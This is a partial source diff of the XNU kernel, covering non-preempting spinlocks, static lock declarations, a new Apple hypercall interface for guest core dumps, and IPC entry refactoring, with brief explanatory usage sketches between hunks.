+static void usimple_lock_nopreempt(usimple_lock_t, lck_grp_t *);
+static unsigned int usimple_lock_try_nopreempt(usimple_lock_t, lck_grp_t *);
+
 /*
  *     We often want to know the addresses of the callers
  *     of the various lock routines.  However, this information
@@ -341,6 +350,22 @@ lck_spin_lock(
        usimple_lock((usimple_lock_t) lck, NULL);
 }
 
+void
+lck_spin_lock_nopreempt(
+       lck_spin_t      *lck)
+{
+       usimple_lock_nopreempt((usimple_lock_t) lck, NULL);
+}
+
+void
+lck_spin_lock_nopreempt_grp(
+       lck_spin_t      *lck,
+       lck_grp_t       *grp)
+{
+#pragma unused(grp)
+       usimple_lock_nopreempt((usimple_lock_t) lck, grp);
+}
+
 /*
  *      Routine:        lck_spin_unlock
  */
@@ -351,6 +376,13 @@ lck_spin_unlock(
        usimple_unlock((usimple_lock_t) lck);
 }
 
+void
+lck_spin_unlock_nopreempt(
+       lck_spin_t      *lck)
+{
+       usimple_unlock_nopreempt((usimple_lock_t) lck);
+}
+
 boolean_t
 lck_spin_try_lock_grp(
        lck_spin_t      *lck,
@@ -383,6 +415,34 @@ lck_spin_try_lock(
        return lrval;
 }
 
+int
+lck_spin_try_lock_nopreempt(
+       lck_spin_t      *lck)
+{
+       boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, LCK_GRP_NULL);
+#if     DEVELOPMENT || DEBUG
+       if (lrval) {
+               pltrace(FALSE);
+       }
+#endif
+       return lrval;
+}
+
+int
+lck_spin_try_lock_nopreempt_grp(
+       lck_spin_t      *lck,
+       lck_grp_t       *grp)
+{
+#pragma unused(grp)
+       boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, grp);
+#if     DEVELOPMENT || DEBUG
+       if (lrval) {
+               pltrace(FALSE);
+       }
+#endif
+       return lrval;
+}
+
 /*
  *     Routine:        lck_spin_assert
  */
@@ -439,12 +499,8 @@ usimple_lock_init(
        usimple_lock_t  l,
        __unused unsigned short tag)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        USLDBG(usld_lock_init(l, tag));
        hw_lock_init(&l->interlock);
-#else
-       simple_lock_init((simple_lock_t)l, tag);
-#endif
 }
 
 volatile uint32_t spinlock_owner_cpu = ~0;
@@ -469,6 +525,22 @@ spinlock_timeout_NMI(uintptr_t thread_addr)
        return spinlock_owner_cpu;
 }
 
+__abortlike
+static void
+usimple_lock_acquire_timeout_panic(usimple_lock_t l)
+{
+       uintptr_t lowner = (uintptr_t)l->interlock.lock_data;
+       uint32_t lock_cpu;
+
+       spinlock_timed_out = l; /* spinlock_timeout_NMI consumes this */
+       lock_cpu = spinlock_timeout_NMI(lowner);
+       panic("Spinlock acquisition timed out: lock=%p, "
+           "lock owner thread=0x%lx, current_thread: %p, "
+           "lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu",
+           l, lowner, current_thread(), lock_cpu,
+           (uintptr_t)l->interlock.lock_data, mach_absolute_time());
+}
+
 /*
  *     Acquire a usimple_lock.
  *
@@ -481,38 +553,57 @@ void
        usimple_lock_t  l
        LCK_GRP_ARG(lck_grp_t *grp))
 {
-#ifndef MACHINE_SIMPLE_LOCK
        DECL_PC(pc);
 
        OBTAIN_PC(pc);
        USLDBG(usld_lock_pre(l, pc));
 
-       if (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) {
-               boolean_t uslock_acquired = FALSE;
-               while (machine_timeout_suspended()) {
-                       enable_preemption();
-                       if ((uslock_acquired = hw_lock_to(&l->interlock, LockTimeOutTSC, grp))) {
-                               break;
-                       }
+       while (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) {
+               if (!machine_timeout_suspended()) {
+                       usimple_lock_acquire_timeout_panic(l);
                }
+               enable_preemption();
+       }
+
+#if DEVELOPMENT || DEBUG
+       pltrace(FALSE);
+#endif
+
+       USLDBG(usld_lock_post(l, pc));
+#if CONFIG_DTRACE
+       LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp));
+#endif
+}
+
+/*
+ *     Acquire a usimple_lock_nopreempt
+ *
+ *     Called and returns with preemption disabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ */
+static void
+usimple_lock_nopreempt(
+       usimple_lock_t  l,
+       lck_grp_t *grp)
+{
+       DECL_PC(pc);
 
-               if (uslock_acquired == FALSE) {
-                       uint32_t lock_cpu;
-                       uintptr_t lowner = (uintptr_t)l->interlock.lock_data;
-                       spinlock_timed_out = l;
-                       lock_cpu = spinlock_timeout_NMI(lowner);
-                       panic("Spinlock acquisition timed out: lock=%p, lock owner thread=0x%lx, current_thread: %p, lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu",
-                           l, lowner, current_thread(), lock_cpu, (uintptr_t)l->interlock.lock_data, mach_absolute_time());
+       OBTAIN_PC(pc);
+       USLDBG(usld_lock_pre(l, pc));
+
+       while (__improbable(hw_lock_to_nopreempt(&l->interlock, LockTimeOutTSC, grp) == 0)) {
+               if (!machine_timeout_suspended()) {
+                       usimple_lock_acquire_timeout_panic(l);
                }
+               enable_preemption();
        }
+
 #if DEVELOPMENT || DEBUG
        pltrace(FALSE);
 #endif
 
        USLDBG(usld_lock_post(l, pc));
-#else
-       simple_lock((simple_lock_t)l, grp);
-#endif
 #if CONFIG_DTRACE
        LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp));
 #endif
@@ -530,7 +621,6 @@ void
 usimple_unlock(
        usimple_lock_t  l)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        DECL_PC(pc);
 
        OBTAIN_PC(pc);
@@ -539,11 +629,28 @@ usimple_unlock(
        pltrace(TRUE);
 #endif
        hw_lock_unlock(&l->interlock);
-#else
-       simple_unlock_rwmb((simple_lock_t)l);
-#endif
 }
 
+/*
+ *     Release a usimple_lock acquired with usimple_lock_nopreempt.
+ *
+ *     Called and returns with preemption enabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ */
+void
+usimple_unlock_nopreempt(
+       usimple_lock_t  l)
+{
+       DECL_PC(pc);
+
+       OBTAIN_PC(pc);
+       USLDBG(usld_unlock(l, pc));
+#if DEVELOPMENT || DEBUG
+       pltrace(TRUE);
+#endif
+       hw_lock_unlock_nopreempt(&l->interlock);
+}
 
 /*
  *     Conditionally acquire a usimple_lock.
@@ -562,7 +669,6 @@ usimple_lock_try(
        usimple_lock_t  l,
        lck_grp_t *grp)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        unsigned int    success;
        DECL_PC(pc);
 
@@ -575,9 +681,36 @@ usimple_lock_try(
                USLDBG(usld_lock_try_post(l, pc));
        }
        return success;
-#else
-       return simple_lock_try((simple_lock_t)l, grp);
+}
+
+/*
+ *     Conditionally acquire a usimple_lock.
+ *
+ *     Called and returns with preemption disabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ *
+ *     XXX No stats are gathered on a miss; I preserved this
+ *     behavior from the original assembly-language code, but
+ *     doesn't it make sense to log misses?  XXX
+ */
+static unsigned int
+usimple_lock_try_nopreempt(
+       usimple_lock_t  l,
+       lck_grp_t *grp)
+{
+       unsigned int    success;
+       DECL_PC(pc);
+
+       OBTAIN_PC(pc);
+       USLDBG(usld_lock_try_pre(l, pc));
+       if ((success = hw_lock_try_nopreempt(&l->interlock, grp))) {
+#if DEVELOPMENT || DEBUG
+               pltrace(FALSE);
 #endif
+               USLDBG(usld_lock_try_post(l, pc));
+       }
+       return success;
 }
 
 /*
index 6ebfd9a7e9df5caa680ef53a281bceb6ae51ea07..7d0e21dac17811cc6e8ccc4250a3049a1bc94d82 100644 (file)
@@ -1237,11 +1237,6 @@ ml_cpu_can_exit(__unused int cpu_id)
        return true;
 }
 
-void
-ml_cpu_init_state(void)
-{
-}
-
 void
 ml_cpu_begin_state_transition(__unused int cpu_id)
 {
index 603fb000860fa3046962d6bf80847c757632653b..29bff1a8f7b54c3a0a053dc4eb908430f93e8566 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/kalloc.h>
 #include <kern/mach_param.h>
 #include <kern/processor.h>
index 6960a022ed8929b7df7fb20d207e2cbd9ffb162b..207db2d6395518ebec0d4709118db00e496c1a4e 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/mach_param.h>
 #include <kern/processor.h>
 #include <kern/cpu_data.h>
index 130c8aec357f3565be6a727162121c57310d762c..642f9f21692e47beae649bdb6d0800019dad6b0f 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
 #include <kern/thread.h>
index 34a434d7d3443267429cdd646c32d633c3807b42..eb470b06ebf474c268999de3d3f1e47e1143b7c2 100644 (file)
@@ -842,6 +842,10 @@ extern boolean_t pmap_is_empty(pmap_t           pmap,
 kern_return_t
     pmap_permissions_verify(pmap_t, vm_map_t, vm_offset_t, vm_offset_t);
 
+#if DEVELOPMENT || DEBUG
+extern kern_return_t pmap_test_text_corruption(pmap_paddr_t);
+#endif /* DEVELOPMENT || DEBUG */
+
 #if MACH_ASSERT
 extern int pmap_stats_assert;
 #define PMAP_STATS_ASSERTF(args)                \
index 4c5d43d09aff6a1cc3997691dcb6b9b7f71b47f1..12d593dc3c00b0c92480accc86138ebf8c976624 100644 (file)
@@ -60,60 +60,8 @@ update_microcode(void)
 }
 
 /* locks */
-static lck_grp_attr_t *ucode_slock_grp_attr = NULL;
-static lck_grp_t *ucode_slock_grp = NULL;
-static lck_attr_t *ucode_slock_attr = NULL;
-static lck_spin_t *ucode_slock = NULL;
-
-static kern_return_t
-register_locks(void)
-{
-       /* already allocated? */
-       if (ucode_slock_grp_attr && ucode_slock_grp && ucode_slock_attr && ucode_slock) {
-               return KERN_SUCCESS;
-       }
-
-       /* allocate lock group attribute and group */
-       if (!(ucode_slock_grp_attr = lck_grp_attr_alloc_init())) {
-               goto nomem_out;
-       }
-
-       if (!(ucode_slock_grp = lck_grp_alloc_init("uccode_lock", ucode_slock_grp_attr))) {
-               goto nomem_out;
-       }
-
-       /* Allocate lock attribute */
-       if (!(ucode_slock_attr = lck_attr_alloc_init())) {
-               goto nomem_out;
-       }
-
-       /* Allocate the spin lock */
-       /* We keep one global spin-lock. We could have one per update
-        * request... but srsly, why would you update microcode like that?
-        */
-       if (!(ucode_slock = lck_spin_alloc_init(ucode_slock_grp, ucode_slock_attr))) {
-               goto nomem_out;
-       }
-
-       return KERN_SUCCESS;
-
-nomem_out:
-       /* clean up */
-       if (ucode_slock) {
-               lck_spin_free(ucode_slock, ucode_slock_grp);
-       }
-       if (ucode_slock_attr) {
-               lck_attr_free(ucode_slock_attr);
-       }
-       if (ucode_slock_grp) {
-               lck_grp_free(ucode_slock_grp);
-       }
-       if (ucode_slock_grp_attr) {
-               lck_grp_attr_free(ucode_slock_grp_attr);
-       }
-
-       return KERN_NO_SPACE;
-}
+static LCK_GRP_DECLARE(ucode_slock_grp, "uccode_lock");
+static LCK_SPIN_DECLARE(ucode_slock, &ucode_slock_grp);
 
 /* Copy in an update */
 static int
@@ -168,13 +116,13 @@ static void
 cpu_apply_microcode(void)
 {
        /* grab the lock */
-       lck_spin_lock(ucode_slock);
+       lck_spin_lock(&ucode_slock);
 
        /* execute the update */
        update_microcode();
 
        /* release the lock */
-       lck_spin_unlock(ucode_slock);
+       lck_spin_unlock(&ucode_slock);
 }
 
 static void
@@ -245,10 +193,6 @@ xcpu_update(void)
 {
        cpumask_t dest_cpumask;
 
-       if (register_locks() != KERN_SUCCESS) {
-               return;
-       }
-
        mp_disable_preemption();
        dest_cpumask = CPUMASK_OTHERS;
        cpu_apply_microcode();
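
The statically declared locks above remove the allocation failure paths that register_locks() had to handle; a hedged sketch of the same LCK_*_DECLARE idiom applied to a hypothetical subsystem:

/* hypothetical example, mirroring the static lock declarations used above */
static LCK_GRP_DECLARE(example_grp, "example_lock");
static LCK_SPIN_DECLARE(example_slock, &example_grp);

static void
example_critical_section(void)
{
	lck_spin_lock(&example_slock);
	/* ... work that must not race ... */
	lck_spin_unlock(&example_slock);
}
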
index efd2ff662cb71d71e297806f973c3efc315fa248..f9cf56840f45b9f529c97bc6a87d4dff5c05a12a 100644 (file)
@@ -42,8 +42,8 @@
 int vmx_use_count = 0;
 boolean_t vmx_exclusive = FALSE;
 
-lck_grp_t *vmx_lck_grp = NULL;
-lck_mtx_t *vmx_lck_mtx = NULL;
+static LCK_GRP_DECLARE(vmx_lck_grp, "vmx");
+static LCK_MTX_DECLARE(vmx_lck_mtx, &vmx_lck_grp);
 
 /* -----------------------------------------------------------------------------
 *  vmx_is_available()
@@ -115,16 +115,6 @@ vmx_enable(void)
        set_cr4(get_cr4() | CR4_VMXE);
 }
 
-void
-vmx_init()
-{
-       vmx_lck_grp = lck_grp_alloc_init("vmx", LCK_GRP_ATTR_NULL);
-       assert(vmx_lck_grp);
-
-       vmx_lck_mtx = lck_mtx_alloc_init(vmx_lck_grp, LCK_ATTR_NULL);
-       assert(vmx_lck_mtx);
-}
-
 /* -----------------------------------------------------------------------------
 *  vmx_get_specs()
 *       Obtain VMX facility specifications for this CPU and
@@ -313,7 +303,7 @@ host_vmxon(boolean_t exclusive)
                return VMX_UNSUPPORTED;
        }
 
-       lck_mtx_lock(vmx_lck_mtx);
+       lck_mtx_lock(&vmx_lck_mtx);
 
        if (vmx_exclusive || (exclusive && vmx_use_count)) {
                error = VMX_INUSE;
@@ -331,7 +321,7 @@ host_vmxon(boolean_t exclusive)
                error = VMX_OK;
        }
 
-       lck_mtx_unlock(vmx_lck_mtx);
+       lck_mtx_unlock(&vmx_lck_mtx);
 
        return error;
 }
@@ -345,7 +335,7 @@ host_vmxoff()
 {
        assert(0 == get_preemption_level());
 
-       lck_mtx_lock(vmx_lck_mtx);
+       lck_mtx_lock(&vmx_lck_mtx);
 
        if (1 == vmx_use_count) {
                vmx_exclusive = FALSE;
@@ -356,7 +346,7 @@ host_vmxoff()
                vmx_use_count--;
        }
 
-       lck_mtx_unlock(vmx_lck_mtx);
+       lck_mtx_unlock(&vmx_lck_mtx);
 
        VMX_KPRINTF("VMX use count: %d\n", vmx_use_count);
 }
index eb939086151d664ffe7d2188dc507bf2b2f26b8b..7edea3f5b184c84b16efc7a04e853f911c9626fc 100644 (file)
@@ -60,7 +60,6 @@ typedef struct vmx_cpu {
        void            *vmxon_region;  /* the logical address of the VMXON region page */
 } vmx_cpu_t;
 
-void vmx_init(void);
 void vmx_cpu_init(void);
 void vmx_resume(boolean_t is_wake_from_hibernate);
 void vmx_suspend(void);
diff --git a/osfmk/i386/x86_hypercall.c b/osfmk/i386/x86_hypercall.c
new file mode 100644 (file)
index 0000000..e76e38d
--- /dev/null
@@ -0,0 +1,96 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/hvg_hypercall.h>
+#include <i386/cpuid.h>
+#include <os/log.h>
+
+
+static bool
+hvg_live_coredump_enabled(void)
+{
+       return cpuid_vmm_present() && (cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0;
+}
+
+/*
+ * This routine issues an Apple hypercall that notifies the hypervisor to
+ * take a guest kernel coredump. If the vmcore argument is not NULL, the
+ * name tag of the vmcore file is copied into the caller's vmcore tag array.
+ * Otherwise the name tag is ignored.
+ */
+
+hvg_hcall_return_t
+hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore,
+    const hvg_hcall_dump_option_t dump_option)
+{
+       hvg_hcall_return_t ret;
+       hvg_hcall_output_regs_t output;
+       const size_t reg_size = sizeof(output.rax);
+
+       /* Does the hypervisor support feature: live kernel core dump? */
+       if (!hvg_live_coredump_enabled()) {
+               return HVG_HCALL_FEAT_DISABLED;
+       }
+
+       /* Make sure that we don't overflow vmcore tag array with hypercall output */
+       if (vmcore && (reg_size != sizeof(uint64_t))) {
+               os_log_error(OS_LOG_DEFAULT, "%s: invalid hcall register size, %zu bytes (expect %zu bytes)\n",
+                   __func__, reg_size, sizeof(uint64_t));
+               return HVG_HCALL_INVALID_PARAMETER;
+       }
+
+       switch (dump_option) {
+       case HVG_HCALL_DUMP_OPTION_REGULAR:
+               /* Only regular dump-guest-memory is supported for now */
+               break;
+       default:
+               return HVG_HCALL_INVALID_PARAMETER;
+       }
+
+       /* Everything checks out, issue hypercall */
+       memset(&output, 0, sizeof(hvg_hcall_output_regs_t));
+       ret = hvg_hypercall1(HVG_HCALL_TRIGGER_DUMP,
+           dump_option,
+           &output);
+
+       if (ret == HVG_HCALL_SUCCESS) {
+               if (vmcore) {
+                       /* Caller requested vmcore tag to be returned */
+                       memcpy(&vmcore->tag[0], &output.rax, reg_size);
+                       memcpy(&vmcore->tag[reg_size], &output.rdi, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 2], &output.rsi, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 3], &output.rdx, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 4], &output.rcx, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 5], &output.r8, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 6], &output.r9, reg_size);
+                       vmcore->tag[reg_size * 7] = '\0';
+               }
+       }
+       return ret;
+}
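
A hedged sketch of a caller, hypothetical and not part of this commit, that requests a live guest core dump through the new routine:

static void
example_request_guest_coredump(void)
{
	hvg_hcall_vmcore_file_t vmcore = {0};
	hvg_hcall_return_t ret;

	ret = hvg_hcall_trigger_dump(&vmcore, HVG_HCALL_DUMP_OPTION_REGULAR);
	if (ret == HVG_HCALL_SUCCESS) {
		/* vmcore.tag now holds the NUL-terminated name tag of the new vmcore file */
	} else if (ret == HVG_HCALL_FEAT_DISABLED) {
		/* hypervisor does not advertise the live core dump feature */
	}
}
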
diff --git a/osfmk/i386/x86_hypercall.h b/osfmk/i386/x86_hypercall.h
new file mode 100644 (file)
index 0000000..7dedfcc
--- /dev/null
@@ -0,0 +1,182 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _I386_X86_HYPERCALL_H_
+#define _I386_X86_HYPERCALL_H_
+
+#if DEBUG || DEVELOPMENT
+
+
+/*
+ * Apple Hypercall Calling Convention (x64)
+ *
+ * Registers |                Usage                       |
+ * --------------------------------------------------------
+ *      %rax |    In:  hypercall code                     |
+ *           |    Out: if RFLAGS.CF = 0 (success)         |
+ *           |           hypercall output[0]              |
+ *           |         if RFLAGS.CF = 1 (error)           |
+ *           |           hypercall error value            |
+ *      %rdi |    In:  1st argument                       |
+ *           |    Out: hypercall output[1]                |
+ *      %rsi |    In:  2nd argument                       |
+ *           |    Out: hypercall output[2]                |
+ *      %rdx |    In:  3rd argument                       |
+ *           |    Out: hypercall output[3]                |
+ *      %rcx |    In:  4th argument                       |
+ *           |    Out: hypercall output[4]                |
+ *      %r8  |    In:  5th argument                       |
+ *           |    Out: hypercall output[5]                |
+ *      %r9  |    In:  6th argument                       |
+ *           |    Out: hypercall output[6]                |
+ *
+ * %rax is used by the caller to specify hypercall code. When a hypercall fails,
+ * the hypervisor stores errno in %rax. A successful hypercall returns the
+ * output of the call in %rax, %rdi, %rsi, %rdx, %rcx, %r8, and %r9.
+ */
+
+typedef struct hvg_hcall_output_regs {
+       uint64_t   rax;
+       uint64_t   rdi;
+       uint64_t   rsi;
+       uint64_t   rdx;
+       uint64_t   rcx;
+       uint64_t   r8;
+       uint64_t   r9;
+} hvg_hcall_output_regs_t;
+
+/*
+ * To avoid collision with other hypercall interfaces (e.g., KVM) in the vmcall
+ * namespace, Apple hypercalls put "A" (0x41) in the top byte of %eax so that
+ * hypervisors can support multiple hypercall interfaces simultaneously and
+ * handle Apple hypercalls correctly for compatibility.
+ *
+ * For example, KVM uses the same vmcall instruction and has call code 1 for
+ * KVM_HC_VAPIC_POLL_IRQ. When invoking an Apple hypercall with code 1, a
+ * hypervisor will not accidentally treat the Apple hypercall as a KVM call.
+ */
+
+#define HVG_HCALL_CODE(code) ('A' << 24 | (code & 0xFFFFFF))
+
+
+/*
+ * Caller is responsible for checking the existence of Apple Hypercall
+ * before invoking Apple hypercalls.
+ */
+
+#define HVG_HCALL_RETURN(rax) {\
+       __asm__ __volatile__ goto (\
+                                  "jnc 2f  \n\t" \
+                                  "jmp %l0 \n\t" \
+                                  "2:      \n\t" \
+                                 : /* no output */ \
+                                 : /* no input */  \
+                                 : /* no clobber */ \
+                                 : error);\
+       return HVG_HCALL_SUCCESS;\
+error:\
+       return (hvg_hcall_return_t)rax;\
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall6(uint64_t code, uint64_t rdi, uint64_t rsi, uint64_t rdx, uint64_t rcx, uint64_t r8, uint64_t r9,
+    hvg_hcall_output_regs_t *output)
+{
+       __asm__ __volatile__ ("movq %12, %%r8  \n\t"
+                          "movq %13, %%r9  \n\t"
+                          "vmcall          \n\t"
+                          "movq %%r8, %5   \n\t"
+                          "movq %%r9, %6   \n\t"
+                        : "=a" (output->rax),         /* %0:  output[0] */
+                          "=D" (output->rdi),         /* %1:  output[1] */
+                          "=S" (output->rsi),         /* %2:  output[2] */
+                          "=d" (output->rdx),         /* %3:  output[3] */
+                          "=c" (output->rcx),         /* %4:  output[4] */
+                          "=r" (output->r8),          /* %5:  output[5] */
+                          "=r" (output->r9)           /* %6:  output[6] */
+                        : "a"  (HVG_HCALL_CODE(code)),/* %7:  call code */
+                          "D"  (rdi),                 /* %8:  arg[0]    */
+                          "S"  (rsi),                 /* %9:  arg[1]    */
+                          "d"  (rdx),                 /* %10: arg[2]    */
+                          "c"  (rcx),                 /* %11: arg[3]    */
+                          "r"  (r8),                  /* %12: arg[4]    */
+                          "r"  (r9)                   /* %13: arg[5]    */
+                        : "memory", "r8", "r9");
+       HVG_HCALL_RETURN(output->rax);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall0(const uint64_t code,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, 0, 0, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall1(const uint64_t code,
+    const uint64_t rdi,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, 0, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall2(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall3(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall4(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, rcx, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall5(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, const uint64_t r8,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, rcx, r8, 0, output);
+}
+
+#endif /* DEBUG || DEVELOPMENT */
+
+#endif /* _I386_X86_HYPERCALL_H_ */
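
As a concrete illustration of the convention above: with 'A' (0x41) placed in the top byte, HVG_HCALL_CODE(1) evaluates to 0x41000001. A hedged sketch of issuing a one-argument call; the call code and argument below are hypothetical, and the caller is assumed to have already verified that Apple hypercalls are available:

static uint64_t
example_issue_hypercall(void)
{
	hvg_hcall_output_regs_t out = {0};

	/* hvg_hypercall1() applies HVG_HCALL_CODE() itself: code 1 is issued as 0x41000001 */
	if (hvg_hypercall1(1, /* rdi = */ 0x1234, &out) != HVG_HCALL_SUCCESS) {
		return 0;
	}
	return out.rax;   /* first of the seven output registers on success */
}
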
index e05803973ecf40d998226036c7c8194c6f792c25..4195a3acaf808f93e99b1f22035b0dfd7b65298d 100644 (file)
@@ -223,34 +223,6 @@ ipc_entry_claim(
        return KERN_SUCCESS;
 }
 
-/*
- *     Routine:        ipc_entry_get
- *     Purpose:
- *             Tries to allocate an entry out of the space.
- *     Conditions:
- *             The space is write-locked and active throughout.
- *             An object may be locked.  Will not allocate memory.
- *     Returns:
- *             KERN_SUCCESS            A free entry was found.
- *             KERN_NO_SPACE           No entry allocated.
- */
-
-kern_return_t
-ipc_entry_get(
-       ipc_space_t             space,
-       mach_port_name_t        *namep,
-       ipc_entry_t             *entryp)
-{
-       kern_return_t kr;
-
-       kr = ipc_entries_hold(space, 1);
-       if (KERN_SUCCESS != kr) {
-               return kr;
-       }
-
-       return ipc_entry_claim(space, namep, entryp);
-}
-
 /*
  *     Routine:        ipc_entry_alloc
  *     Purpose:
@@ -281,9 +253,9 @@ ipc_entry_alloc(
                        return KERN_INVALID_TASK;
                }
 
-               kr = ipc_entry_get(space, namep, entryp);
+               kr = ipc_entries_hold(space, 1);
                if (kr == KERN_SUCCESS) {
-                       return kr;
+                       return ipc_entry_claim(space, namep, entryp);
                }
 
                kr = ipc_entry_grow_table(space, ITS_SIZE_NONE);
@@ -409,7 +381,6 @@ ipc_entry_alloc_name(
                 */
                kern_return_t kr;
                kr = ipc_entry_grow_table(space, index + 1);
-               assert(kr != KERN_NO_SPACE);
                if (kr != KERN_SUCCESS) {
                        /* space is unlocked */
                        return kr;
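
With ipc_entry_get() removed, callers use the reserve-then-claim pair directly, as ipc_entry_alloc() now does; a hedged sketch with a hypothetical caller, the space assumed write-locked and active:

static kern_return_t
example_alloc_entry(ipc_space_t space, mach_port_name_t *namep, ipc_entry_t *entryp)
{
	kern_return_t kr;

	kr = ipc_entries_hold(space, 1);        /* reserve one free entry; allocates nothing */
	if (kr != KERN_SUCCESS) {
		return kr;                      /* caller grows the table and retries */
	}
	return ipc_entry_claim(space, namep, entryp);   /* consume the reservation */
}
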
index 5601b84c82283a1ba511b5b0fcbc47bd4d3f4bb2..781cc5c1c73c7c54f016d0b4f7003ec9967a7ea0 100644 (file)
@@ -235,12 +235,6 @@ extern kern_return_t ipc_entry_claim(
        mach_port_name_t        *namep,
        ipc_entry_t             *entryp);
 
-/* Allocate an entry in a space */
-extern kern_return_t ipc_entry_get(
-       ipc_space_t             space,
-       mach_port_name_t        *namep,
-       ipc_entry_t             *entryp);
-
 /* Allocate an entry in a space, growing the space if necessary */
 extern kern_return_t ipc_entry_alloc(
        ipc_space_t             space,
index 87a31f7842139ab1f87a31dec2a9737c285de4dd..7e461457fa8bde950e0cfa4c533cf363abe0b8a3 100644 (file)
@@ -1009,7 +1009,7 @@ convert_port_to_eventlink_locked(
 
        if (ip_active(port) &&
            ip_kotype(port) == IKOT_EVENTLINK) {
-               ipc_eventlink = (struct ipc_eventlink *)port->ip_kobject;
+               ipc_eventlink = (struct ipc_eventlink *)ipc_kobject_get(port);
 
                if (ipc_eventlink) {
                        ipc_eventlink_reference(ipc_eventlink);
